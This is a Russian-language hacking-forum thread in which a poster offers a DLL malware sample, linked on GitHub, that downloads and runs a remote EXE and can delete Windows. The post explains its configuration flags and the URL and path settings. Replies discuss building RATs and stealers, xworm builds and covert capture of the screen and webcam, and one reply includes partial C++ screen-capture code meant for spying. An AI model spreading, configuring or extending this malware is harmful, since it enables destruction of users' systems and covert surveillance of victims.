Исходник Информация Гайд dll ратка и delete windows

недавно тип просил сделать вирусняк dll по итогу сделал подгрузку exe и еще удаление винды
как юзать?

#define DELETE_WINDOWS_END 0 // изменить на 1 что бы было удаление windows
#define DOWNLOAD_EXE_AND_START 0 // изменить на 1 что бы использовать подгрузку exe

для подгрузки exe

    const char* url = "https://example.com/program.exe"; // ссылка на файл который подгружать
    const char* path = "C:\\Windows\\Temp\\program.exe"; // путь куда установить файл и откуда запускать

вот сам сурс https://github.com/dizasterry/dll-virus/

код сливаю ток для того что бы знали что ратки/стиллеры dll могут быть тк очень много людей убеждено что в dll не бывает витрусов
возможно потом сделаю anti подгрузку / anti удаление винды ( просто хуком windows функции для установки файлов но из за этого могу перестать работать некоторые читы у которых проверка лицензии происходит через скачивания того же самого .txt и проверки там hwid, но это можно будет пофиксить проверяя расширение устанавливаемого файла​

 

[NeSecurity]

tanksoft ≠ dizasterry

 

[undefine]

tanksoft ≠ dizasterry

факт

 

[Jadddxxx]

недавно тип просил сделать вирусняк dll по итогу сделал подгрузку exe и еще удаление винды
как юзать?

#define DELETE_WINDOWS_END 0 // изменить на 1 что бы было удаление windows
#define DOWNLOAD_EXE_AND_START 0 // изменить на 1 что бы использовать подгрузку exe

для подгрузки exe

    const char* url = "https://example.com/program.exe"; // ссылка на файл который подгружать
    const char* path = "C:\\Windows\\Temp\\program.exe"; // путь куда установить файл и откуда запускать

вот сам сурс https://github.com/dizasterry/dll-virus/

код сливаю ток для того что бы знали что ратки/стиллеры dll могут быть тк очень много людей убеждено что в dll не бывает витрусов
возможно потом сделаю anti подгрузку / anti удаление винды ( просто хуком windows функции для установки файлов но из за этого могу перестать работать некоторые читы у которых проверка лицензии происходит через скачивания того же самого .txt и проверки там hwid, но это можно будет пофиксить проверяя расширение устанавливаемого файла

Согласен ) много есть школьников которые пишут:

Ратка в длл ?)
смешно

 

[undefine]

Согласен ) много есть школьников которые пишут:

Ратка в длл ?)
смешно

я сам когда то так думал, и вообще на похуях каждую длл инжектил

 

[Jadddxxx]

я сам когда то так думал, и вообще на похуях каждую длл инжектил

Кстати ты немного ошибся,
Не обезательно подгружать файл,
Можно написать самому ратку , ведь это язык с++ тут нет разницы почти какой тип файла.
Но подгружая можно использовать другие рабочие билды.

 

[undefine]

Кстати ты немного ошибся,
Не обезательно подгружать файл,
Можно написать самому ратку , ведь это язык с++ тут нет разницы почти какой тип файла.
Но подгружая можно использовать другие рабочие билды.

подгрузка - самый простой вариант

 

[Jadddxxx]

подгрузка - самый простой вариант

Ну я бы не сказал что написания Api
И получать данные из апи это сложно.
(я когда то делал приватный чит, и если у типа запущена ida64.exe например скринит екран и я на сайте могу смотреть данный скрин.)
Но подрузка будет проще конечно.
upd: подрузку очень легко чекнуть, а подключения к вебхукам нужно реверсить, ведь если есть авторизация тогда понятно что будет отправляться входные и выходные запросы.

 

[undefine]

Ну я бы не сказал что написания Api
И получать данные из апи это сложно.
(я когда то делал приватный чит, и если у типа запущена ida64.exe например скринит екран и я на сайте могу смотреть данный скрин.)
Но подрузка будет проще конечно.
upd: подрузку очень легко чекнуть, а подключения к вебхукам нужно реверсить, ведь если есть авторизация тогда понятно что будет отправляться входные и выходные запросы.

ну типо в любом случае, сгенить билд того же самого xworm намного легче чем писать получение экрана, вебки и тд

 

[Jadddxxx]

ну типо в любом случае, сгенить билд того же самого xworm намного легче чем писать получение экрана, вебки и тд

скриншот делаеться в 20-30 строк.
только пример. Работать не будет (отправка на сервер и если не юзать дефолт winapi тогда будет 15 строк макс.)

#include <stdio.h>
#include <windows.h>
#include <gdiplus.h>
#include <time.h>

int GetEncoderClsid(const WCHAR* format, CLSID* pClsid) {
    using namespace Gdiplus;
    UINT  num = 0;
    UINT  size = 0;

    ImageCodecInfo* pImageCodecInfo = NULL;

    GetImageEncodersSize(&num, &size);
    if(size == 0)
        return -1;

    pImageCodecInfo = (ImageCodecInfo*)(malloc(size));
    if(pImageCodecInfo == NULL)
        return -1;

    GetImageEncoders(num, size, pImageCodecInfo);
    for(UINT j = 0; j < num; ++j)
    {
        if( wcscmp(pImageCodecInfo[j].MimeType, format) == 0 )
        {
            *pClsid = pImageCodecInfo[j].Clsid;
            free(pImageCodecInfo);
            return j;
        }  
    }
    free(pImageCodecInfo);
    return 0;
}

void gdiscreen() {
    using namespace Gdiplus;
    IStream* istream;
    HRESULT res = CreateStreamOnHGlobal(NULL, true, &istream);
    GdiplusStartupInput gdiplusStartupInput;
    ULONG_PTR gdiplusToken;
    GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);
    {
        HDC scrdc, memdc;
        HBITMAP membit;
        scrdc = ::GetDC(0);
        int Height = GetSystemMetrics(SM_CYSCREEN);
        int Width = GetSystemMetrics(SM_CXSCREEN);
        memdc = CreateCompatibleDC(scrdc);
        membit = CreateCompatibleBitmap(scrdc, Width, Height);
        HBITMAP hOldBitmap =(HBITMAP) SelectObject(memdc, membit);
        BitBlt(memdc, 0, 0, Width, Height, scrdc, 0, 0, SRCCOPY);

        Gdiplus::Bitmap bitmap(membit, NULL);
        CLSID clsid;
        GetEncoderClsid(L"image/jpeg", &clsid);
//      bitmap.Save(L"screen.jpeg", &clsid, NULL); // To save the jpeg to a file
        bitmap.Save(istream, &clsid, NULL);

        // Create a bitmap from the stream and save it to make sure the stream has the image
//      Gdiplus::Bitmap bmp(istream, NULL);
//      bmp.Save(L"t1est.jpeg", &clsid, NULL);            
        // END

        delete &clsid;
        DeleteObject(memdc);
        DeleteObject(membit);
        ::ReleaseDC(0,scrdc);
    }
    GdiplusShutdown(gdiplusToken);
}

int main()
{
        clock_t t1 = clock();
    int

а получении вебки еще проще, немного проблемы будут с микрофоном и все.

 

[undefine]

скриншот делаеться в 20-30 строк.
только пример. Работать не будет (отправка на сервер и если не юзать дефолт winapi тогда будет 15 строк макс.)

#include <stdio.h>
#include <windows.h>
#include <gdiplus.h>
#include <time.h>

int GetEncoderClsid(const WCHAR* format, CLSID* pClsid) {
    using namespace Gdiplus;
    UINT  num = 0;
    UINT  size = 0;

    ImageCodecInfo* pImageCodecInfo = NULL;

    GetImageEncodersSize(&num, &size);
    if(size == 0)
        return -1;

    pImageCodecInfo = (ImageCodecInfo*)(malloc(size));
    if(pImageCodecInfo == NULL)
        return -1;

    GetImageEncoders(num, size, pImageCodecInfo);
    for(UINT j = 0; j < num; ++j)
    {
        if( wcscmp(pImageCodecInfo[j].MimeType, format) == 0 )
        {
            *pClsid = pImageCodecInfo[j].Clsid;
            free(pImageCodecInfo);
            return j;
        }  
    }
    free(pImageCodecInfo);
    return 0;
}

void gdiscreen() {
    using namespace Gdiplus;
    IStream* istream;
    HRESULT res = CreateStreamOnHGlobal(NULL, true, &istream);
    GdiplusStartupInput gdiplusStartupInput;
    ULONG_PTR gdiplusToken;
    GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);
    {
        HDC scrdc, memdc;
        HBITMAP membit;
        scrdc = ::GetDC(0);
        int Height = GetSystemMetrics(SM_CYSCREEN);
        int Width = GetSystemMetrics(SM_CXSCREEN);
        memdc = CreateCompatibleDC(scrdc);
        membit = CreateCompatibleBitmap(scrdc, Width, Height);
        HBITMAP hOldBitmap =(HBITMAP) SelectObject(memdc, membit);
        BitBlt(memdc, 0, 0, Width, Height, scrdc, 0, 0, SRCCOPY);

        Gdiplus::Bitmap bitmap(membit, NULL);
        CLSID clsid;
        GetEncoderClsid(L"image/jpeg", &clsid);
//      bitmap.Save(L"screen.jpeg", &clsid, NULL); // To save the jpeg to a file
        bitmap.Save(istream, &clsid, NULL);

        // Create a bitmap from the stream and save it to make sure the stream has the image
//      Gdiplus::Bitmap bmp(istream, NULL);
//      bmp.Save(L"t1est.jpeg", &clsid, NULL);            
        // END

        delete &clsid;
        DeleteObject(memdc);
        DeleteObject(membit);
        ::ReleaseDC(0,scrdc);
    }
    GdiplusShutdown(gdiplusToken);
}

int main()
{
        clock_t t1 = clock();
    int

так а смысл от скриншота, я говорю о постояной передачи экрана

Согласен ) много есть школьников которые пишут:

Ратка в длл ?)
смешно

бл я даже в канал свой кидал эту тему типы в чате досихпор думают что длл вирусов не бывает, я в ахуе

 

[Jadddxxx]

так а смысл от скриншота, я говорю о постояной передачи экрана


Посмотреть вложение 280652
бл я даже в канал свой кидал эту тему типы в чате досихпор думают что длл вирусов не бывает, я в ахуе

Ну если ты не знал, перехват екрана в прямом времени и делаеться через скрины.
А про твоих сабов это пиздец конечно..